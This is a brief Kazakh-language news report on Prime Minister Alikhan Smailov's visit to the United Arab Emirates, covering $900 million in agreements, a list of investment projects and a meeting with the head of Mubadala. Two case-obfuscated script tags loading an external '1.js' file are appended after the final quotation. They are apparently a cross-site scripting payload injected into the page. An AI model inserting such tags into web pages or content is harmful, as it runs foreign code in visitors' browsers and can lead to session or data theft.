Қазақстан мен БАӘ арасында $900 млн болатын келісімдерге қол қойылды Біріккен Араб Әмірліктеріне ресми сапармен барған ҚР Премьер-Министрі Әлихан Смайылов осы елдің іскер топтар өкілдерімен келіссөздер жүргізді. Инвесторларға тау-кен металлургия кешені, ауыл шаруашылығы, мұнай-газ саласы, құрылыс және т. б. салалардағы жалпы сомасы $6,5 млрд-тан астам жаңадан 40 инвестициялық жобалар тізімі ұсынылды. Әлихан Смайылов «Mubadala» тобының бас атқарушы директоры Мусаббих әл-Каабимен кездесті. «Mubadala» – бағалау активтері $285 млрд-ты құрайтын және тәуелсіз қорлардың әлемдік рейтингісінде 13-ші орынға ие мемлекеттік инвестициялық-девелоперлік компания. Премьер-Министр ҚР Үкіметі бірқатар бағыттар бойынша ынтымақтастықты кеңейтуге мүдделі екенін атап өтті. «Энергетика, химия өнеркәсібі, ауыл шаруашылығы, тау-кен металлургия кешені салаларында әлеуетіміз зор. Бұл тұрғыда әлемдегі қазіргі жағдайды ескере отырып, арнайы әзірленген жаңа жобаларды іске асыруға қатысуды ұсынамын», — деді Әлихан Смайылов.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>